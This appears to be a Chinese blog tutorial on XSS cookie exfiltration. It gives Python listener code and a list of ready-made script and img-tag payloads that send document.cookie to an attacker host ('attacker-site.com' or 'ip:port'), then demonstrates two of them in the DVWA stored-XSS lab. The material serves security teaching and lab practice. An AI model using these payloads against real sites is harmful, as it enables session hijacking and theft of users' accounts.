[网络安全]XSS之Cookie外带攻击姿势及例题详析
[网络安全]XSS之Cookie外带攻击姿势及例题详析
- 概念
- 姿势及Payload
- 启动HTTP协议 method1
- 启动HTTP协议 method2
- 例题详析
- Payload1
- Payload2
- window.open
- 总结
本文仅分享XSS攻击知识,不承担任何法律责任。
本文涉及的软件等请读者自行安装,本文不再赘述。
概念
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。
攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
姿势及Payload
XSS 的 Cookie 外带攻击分为
- 在输入框中注入恶意代码
- 在 URL 中注入特定的参数或路径来触发
- 其它方法
-
在输入框中注入恶意代码的方式可能包括:在
评论框、留言框、搜索框等用户输入区域中插入可执行的 JavaScript 代码,或者在提交表单时篡改表单字段、注入恶意脚本等。当用户提交表单时,恶意代码被执行并将 Cookie 数据上传到攻击者的服务器上。 -
在 URL 中注入恶意参数或路径的方式通常包括:
将包含恶意脚本的 URL 发送给受害者,或者将其嵌入到网站的页面中,并欺骗受害者点击该链接。一旦受害者点击了该链接,则可触发 XSS 漏洞,从而实现 Cookie 外带攻击。 -
其他的触发方式,包括:
通过恶意广告:攻击者可以将恶意脚本插入到广告代码中,然后在网站上显示这段广告。当用户点击该广告或鼠标移动到该广告区域时,恶意代码被执行,从而触发 XSS 攻击。
通过 CSRF 攻击:攻击者可以在已登录的用户浏览器中执行 CSRF(跨站请求伪造)攻击,并在攻击载荷中注入恶意 XSS 代码。当用户访问包含恶意代码的页面时,会触发 XSS 攻击。
通过文件上传:攻击者可以在 Web 应用程序中上传包含恶意脚本的文件,例如图片、文档或视频等。当用户下载并打开该文件时,恶意代码被执行,从而触发 XSS 攻击。
在使用XSS语句将Cookie外带到攻击者IP地址前,需要在攻击机上起一个http协议,使得目标机能够将Cookie发送给该IP地址
启动HTTP协议 method1
本文使用本机起IP地址
-
使用文本编辑器(例如 Sublime Text、VS Code 等)创建一个新的 Python 文件。
-
导入 socket 库。socket 库是 Python 标准库的一部分,提供了网络编程相关的 API 和函数。
import socket -
选择一个主机地址和端口号来监听连接请求。主机地址可以是 IP 地址或域名。你可以选择任何未使用的端口号作为监听端口。
HOST = 'localhost' # 或者使用本机的 IP 地址,如 '192.168.1.2' PORT = 8000 #或2023、2020 -
需要创建一个 socket 对象。可以使用
socket()函数来创建一个 socket 对象,并指定协议族(例如AF_INET),以及套接字类型(例如SOCK_STREAM)。server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -
绑定主机地址和端口号到 socket 对象上。可以使用
bind()函数来绑定主机地址和端口号。server_socket.bind((HOST, PORT)) -
开始监听连接请求。可以使用
listen()函数来开始监听连接请求。传入的参数表示最大等待连接数。server_socket.listen(2)
综合起来,一个简单的启动 IP 地址的 Python 代码如下所示:
import socketHOST = '本机IP地址'
PORT = 2022server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 创建一个服务器套接字,使用 IPv4 地址族(AF_INET)和 TCP 传输协议(SOCK_STREAM)
server_socket.bind((HOST, PORT))
# 将服务器套接字与特定的主机地址和端口号进行绑定,以便客户端能够找到它
server_socket.listen(1)print('等待客户端连接...')# 接受客户端连接
client_socket, addr = server_socket.accept()
print('客户端已连接:', addr)# 接收客户端发送的数据
data = client_socket.recv(1024)
print('接收到数据:', data.decode())# 将接收到的数据原样返回给客户端
client_socket.sendall(data)# 关闭客户端连接
client_socket.close()
# 使用 close() 方法关闭套接字并释放所有相关的资源;# 关闭服务器套接字
server_socket.close()
# 使用 close() 方法关闭套接字并释放所有相关的资源。
-
一旦有客户端连接,accept() 方法会返回一个新的客户端套接字和客户端地址信息(包括 IP 地址和端口号)
-
recv() 方法会阻塞程序,直到有数据可用或者超时,然后将接收到的数据作为 Python 字节对象返回。在本例中,客户端发送的数据最大为 1024 字节;
-
将接收到的数据原样发送回客户端,使用 sendall() 方法向客户端套接字写入数据。
注意,sendall() 方法保证能够将所有数据发送出去,因此不需要循环调用其它方法来确保消息完整发送
接着,使用 Python 解释器来执行该文件。可以通过终端或命令提示符进入包含该文件的目录,并使用 python 命令后跟文件名来运行该文件,例如:
python test.py
其中,test.py 是 Python 文件的文件名。执行后,服务器将启动并开始监听指定的 IP 地址和端口号,等待客户端连接。
最后,在页面执行 XSS 的 Cookie外带攻击,使目标机向指定的IP地址发送Cookie,监听的端口即可接收。
启动HTTP协议 method2
打开python2终端输入:
python2 -m SimpleHTTPServer 8080(端口号)
打开python3终端输入:
python3 -m http.server 8080(端口号)
即可监听8080端口,接受XSS语句外带的Cookie
以下是一些常见的 XSS 的 Cookie 外带攻击语句:
- 利用 document.cookie 获取当前域下所有 cookie 的值:
<script>new Image().src="http://attacker-site.com/cookie.php?cookie="+document.cookie;</script>
- 将当前页面的 URL 和 Cookie 发送到攻击者的服务器:
<img src="http://attacker-site.com/logger.php?url="+encodeURIComponent(document.location.href)+"&cookie="+encodeURIComponent(document.cookie)" />
- 利用 XMLHttpRequest 对象发送 HTTP 请求,将 Cookie 数据发送到攻击者的服务器:
<script>var xhr = new XMLHttpRequest(); xhr.open("POST", "http://attacker-site.com/logger.php", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('url=' + encodeURIComponent(document.location.href) + '&cookie=' + encodeURIComponent(document.cookie));</script>
- 利用 window.location 对象向攻击者的服务器提交请求,附带当前页面的 URL 和 Cookie:
<script>window.location="http://attacker-site.com/logger.php?url="+encodeURIComponent(document.location.href)+"&cookie="+encodeURIComponent(document.cookie);</script>
- 利用 document.write 返回页面中的Cookie,并将其拼接到目标URL中,作为参数发送到指定的 IP 地址和端口
<script>document.write('<img src="http://ip:端口号/'+document.cookie+'"/>')</script>
- 通过 window.open 方法打开了指定的攻击机地址,并拼接、传递cookie
<img src=1 onerror=window.open("http://ip:端口号/?id="+document.cookie)>
例题详析
本文以DVWA之XSS(Stored) low-level为例,通过DVWA本地环境进行XSS之Cookie外带例题详析。
-
写入python文件,以test.py命名,IP为本机IPv4地址,端口为2022,启动监听

-
在页面执行 XSS 的 Cookie外带攻击,使目标机向指定的IP地址发送Cookie
Payload1
Name栏输入:1
Message栏输入:<script>document.write('<img src="http://IPv4地址:2022/'+document.cookie+'"/>')</script>

绕过Message栏的字符串长度限制可参考:
[网络安全]DVWA之XSS(Stored)攻击姿势及解题详析合集
如下图,XSS语句注入成功:

端口监听到数据:

Payload2
<img src=1 onerror=window.open("http://IPv4地址:2022/?id="+document.cookie)>
使用 onerror 事件的方式,在图片加载失败时触发一个错误事件,通过 window.open 方法打开了指定的攻击机地址,并传递cookie
window.open
window.open() 是 JavaScript 中用于打开新窗口或新标签页的方法。它接受一个 URL 作为参数,返回一个新的浏览器窗口对象或者选项卡对象。在实际应用中,可以使用该方法来实现各种功能,如显示广告、打开弹窗、播放视频等。
例如,以下代码将会在新窗口或新标签页中打开指定 URL:
window.open("http://www.example.com");
除了 URL 参数之外,还可以传递一些可选的参数,如窗口大小、位置、工具栏和滚动条等属性。例如:
window.open("http://www.example.com","myWindow","width=400,height=300,left=100,top=100,toolbar=yes,scrollbars=yes");
如下图,XSS语句注入成功:

页面跳转并传递cookie:

总结
以上为[网络安全]XSS之Cookie外带攻击姿势及例题详析,读者可躬身实践,
DVWA之XSS相关:
[网络安全]DVWA之XSS(Stored)攻击姿势及解题详析合集
[网络安全]DVWA之XSS(Reflected)攻击姿势及解题详析合集
[网络安全]DVWA之XSS(DOM)攻击姿势及解题详析合集
我是秋说,我们下次见。
相关文章:
[网络安全]XSS之Cookie外带攻击姿势及例题详析
[网络安全]XSS之Cookie外带攻击姿势及例题详析 概念姿势及Payload启动HTTP协议 method1启动HTTP协议 method2 例题详析Payload1Payload2window.open 总结 本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 概…...
Angular之创建项目报错:setTimeout is not defined
零基础的宝们,跟着视频学习Angular中,会教授大家如何创建一个新项目。 但是在操作时就会遇到无法创建的问题。 接下来我们一起来看看,本人Angular起步时卡在家门口的问题。 在已经安装了nodejs的情况下,被建议使用cnpm命令全局安装…...
python实现神经网络之---构建神经元模型1(python3.7)
本文主要要以周志华的机器学习书为蓝本编写 第5章神经网络 5.1python 实现神经元模型 神经网络中最基本的成分是神经元 (neuro且)模型,如下图所示: 1943 年, [McCulloch and Pitts, 1943] 将上述情形抽象为国 5.1所示的简单模型,…...
前端面试题 —— JavaScript (三)
一、JavaScript有哪些内置对象 全局的对象( global objects )或称标准内置对象,不要和 "全局对象(global object)" 混淆。这里说的全局的对象是说在全局作用域里的对象。全局作用域中的其他对象可以由用户的…...
【openGauss】一键编译openGauss5.0+dolphin,体验新增的mysql兼容特性
脚本 新建一个/opt/onekey-build-og.sh文件,存入以下内容 #!/bin/bash # 环境 centos 7.9 4C 8G (配置越高编译越快,4G内存编译不了,磁盘大概需要14GB) # 安装一些依赖 (libaio-devel如果不卸载重装,可能会找不到io_c…...
【LeetCode - 每日一题】1073. 负二进制数相加 (2023.05.18)
1073. 负二进制数相加 题意 基数为 -2 。实现两个 0/1 数组串的加法。 解法 这是一道模拟题。 设 arr1[i] 和 arr2[i] 是数组 arr1 和 arr2 从低到高的第 i 位数。 首先回顾普通的二进制数的相加,从低位开始计算,在计算的同时维护用一个变量 carry…...
软件上线会面临哪些缺陷?这四种你一定很熟悉
上线对任何软件产品来说都是一件大事,确保一切正常并且向用户发布高质量的软件非常重要。劣质、过早、不稳定、难以使用的产品会产生大量经济损失,也可能使用户对品牌本身失去信任。一直以来,我们都说应该测试,应该将缺陷修复到可…...
html监听界面被隐藏或显示
vue相比于小程序和uni-app 显然少了两个有点用的生命周期 onShow 应用被展示 onHide 应用被隐藏 但其实这个 要做其实也很简单 JavaScript中 有对应的visibilitychange事件可以监听 我们Html参考代码如下 <!DOCTYPE html> <html lang"en"> <head>…...
Springboot启动失败 DB连不上竟然是maven配置的问题
Springboot启动失败:Failed to instantiate [javax.sql.DataSource]。 最开始以为是DB版本后,需要升级驱动版本,但更新驱动版本还是不行,而且另外一个项目同样驱动同样配置可以启动。 后面发现代码读取不到yml文件中的配置信息。…...
P9234 [蓝桥杯 2023 省 A] 买瓜 题解
题目传送门 前言 说实话这题根本用不到什么折半……,今天看机房大佬写了半天加了一堆剪枝还以为很难,其实是你们想复杂了 20分钟不到从看题到代码实现 这题其实只需要可行性剪枝加排序 哦还有个后缀和 进入正题 小木棍子都听说过吧 没错就是小波上…...
ThingsBoard自定义分发节点duplicate to related
------------------------------------内容仅博主所有,订阅者请勿泄露,感谢--------------------- 1、概述 大家好,我又更新干货了,还是那句话,我绝不像某些博主“拿我格子衫”分享那些照抄官网翻译的东西来骗订阅,我觉得那是浪费时间,要搞就搞干货,今天给大家分享Th…...
vim自动更新ctags与taglist
vim的 ctags 和 taglist 在默认情况下是不进行自动更新的,这对于编写代码是非常不方便的,好在vim的脚本还是很强大的,于是在vimrc中添加如下函数: function! UpdateCtags()let curdirgetcwd()while !filereadable("./tags&qu…...
linux查看日志常用命令,动态日志命令
linux查看日志命令,动态日志命令: tail: -n是显示行号;相当于nl命令;例子如下: tail -100f test.log 实时监控100行日志。 tail -n 10 test.log 查询日志尾部最后10行的日志。 tail -…...
分段存储管理方式
目录 一、分段存储管理方式的引入的需求: 1.方便编程 2.信息共享 3.信息保护 4.动态增长 5.动态链接 二、分段系统的基本原理 1.分段 2.段表 3.地址变换机构 4.分页与分段的主要区别 三、信息共享 四、段页式存储管理方式 1.基本原理 2.地址变换过程 分段与分页…...
将nacos从本地切换到远程服务器上时报错:客户端端未连接,Client not connected
报错信息: 09:34:38.438 [com.alibaba.nacos.client.Worker] ERROR com.alibaba.nacos.common.remote.client - Send request fail, request ConfigBatchListenRequest{headers{charsetUTF-8, Client-AppNameunknown, Client-RequestToken65c0fbf47282ae0a7b85178…...
系统掌握入河排污口设置论证技术、方法及报告编制框架
在短时间内较系统的掌握入河排污口设置论证技术、方法及报告编制框架,学习内容以城镇生活污水厂、造纸项目、石化项目、制药项目案例为线索,系统讲解入河排污口设置论证报告书编制过程,并以水质模型为手段,讲解水质影响预测模型的…...
服务端渲染
服务端渲染 和 前后端分离! 渲染 什么是渲染呢 ? 其实很简单, 就是把数据反应在页面上,说白了, 就是利用 js 的语法, 把某些数据组装成 html 结构的样子, 放在页面上展示。 举个例子 : 1. 准备一段 html 结构 <h1>hello world</h1> <di…...
干货丨警惕!14个容易导致拒稿的常见错误
Hello,大家好! 这里是壹脑云科研圈,我是喵君姐姐~ 从做研究、到写论文、再到投稿,每一步都是巨大的挑战。以下列举了一些在这些过程中可能导致拒稿的常见错误,希望能帮助大家避开。 01 格式问题 1.没有遵守投稿须知 期刊提供了…...
Web基础 ( 二 ) CSS
2.CSS 2.1.概念与基础 2.1.1.什么是CSS Cascading Style Sheets 全称层叠样式单 简称样式表。 是告诉浏览器如何来显示HTML的元素的特殊标记 2.1.2.编写方式 2.1.2.1.外部文件 在html文件的<head>中加入<link>结点来引入外部的文件 <link rel"stylesh…...
MSQL系列(一) Mysql实战-索引结构 二叉树/平衡二叉树/红黑树/BTree/B+Tree
Mysql实战-索引结构 二叉树/平衡二叉树/红黑树/BTree/BTree 我们在项目中都会使用索引,所以我们要了解索引的存储结构,今天我们就着重讲解下Mysql的索引结构存储模型,并且看下 二叉树,平衡二叉树,红黑树,B…...
终极指南:如何通过OmenSuperHub免费解锁惠普游戏本硬件性能限制
终极指南:如何通过OmenSuperHub免费解锁惠普游戏本硬件性能限制 【免费下载链接】OmenSuperHub 使用 WMI BIOS控制性能和风扇速度,自动解除DB功耗限制。 项目地址: https://gitcode.com/gh_mirrors/om/OmenSuperHub OmenSuperHub是一款专为惠普OM…...
017、归一化层改进策略:从训练震荡到推理加速的实战调优
017、归一化层改进策略:从训练震荡到推理加速的实战调优 问题现场:BatchNorm在边缘设备上的“水土不服” 上周调试一个YOLO模型部署到Jetson Nano时遇到了诡异现象:训练时mAP达到78.2%,部署后直接掉到62.3%。同一批测试数据,精度断崖式下跌。排查了三天,最终定位到Batc…...
万物识别镜像效果展示:实测识别小麦条锈病,准确率超96%
万物识别镜像效果展示:实测识别小麦条锈病,准确率超96% 1. 从田间到屏幕:AI如何一眼看穿小麦病害 清晨的麦田里,农技员小李发现一片叶片上出现了奇怪的黄色斑点。传统做法需要采集样本送回实验室,等待3-5天才能出结果…...
Lychee Rerank MM开源可部署:GitHub可获取完整代码+Dockerfile+文档
Lychee Rerank MM开源可部署:GitHub可获取完整代码Dockerfile文档 1. 项目概述 Lychee Rerank MM 是一个基于 Qwen2.5-VL 构建的高性能多模态重排序系统。由哈工大(深圳)自然语言处理团队开发,专门解决多模态检索场景中的精准语…...
Qwen-Image-2512-Pixel-Art-LoRA 提示词工程进阶:掌握控制像素艺术风格与细节的秘诀
Qwen-Image-2512-Pixel-Art-LoRA 提示词工程进阶:掌握控制像素艺术风格与细节的秘诀 你是不是也遇到过这样的情况:用像素艺术模型生成图片,出来的效果要么像素块太大太粗糙,要么颜色花里胡哨不像复古游戏,要么就是画面…...
其实我现在对于app广告拦截不是很在意-----因为国外app是绝对不允许出现摇一摇的
国外的APP只有点击指定按钮才允许跳转,不像国内app,只要你点不到那个按钮就跳转。这种摆明了是在刷GDP的行为,当然不会有人管。...
告别玄学排错:手把手教你用Process Monitor和Wireshark诊断Ping域名的神秘故障
告别玄学排错:手把手教你用Process Monitor和Wireshark诊断Ping域名的神秘故障 当你在终端输入ping example.com却只看到"Ping请求找不到主机"的报错,而nslookup example.com却能正常返回IP地址时,这种矛盾现象往往让人抓狂。本文…...
[技术解析]构建可证明鲁棒的RAG:抵御检索污染攻击的隔离聚合策略
1. 当RAG系统遭遇"检索污染攻击"时会发生什么? 想象一下,你正在用智能助手查询"如何安全设置家庭WiFi密码",结果却返回了"请点击以下链接输入你的银行账号"的恶意回复。这就是典型的检索污染攻击场景——攻击者…...
Stable Yogi Leather-Dress-Collection实际案例:动漫角色皮衣换装前后对比图集
Stable Yogi Leather-Dress-Collection实际案例:动漫角色皮衣换装前后对比图集 1. 引言:当动漫角色穿上皮衣,效果有多惊艳? 想象一下,你最喜欢的动漫角色,突然换上了一身酷炫的皮衣,会是什么样…...
数据团队该醒醒了:AI智能体不是你的下一个仪表盘众
7.1 初识三维模型 7.1.1 三维模型的数据载体 随着计算机图形技术的发展,我们或多或少都会见过或者听说过三维模型。笔者始终记得小时候第一次在电视上看到三维动画《变形金刚:超能勇士》的震撼感受;而现在我们已经可以在手机上玩三维游戏《王…...
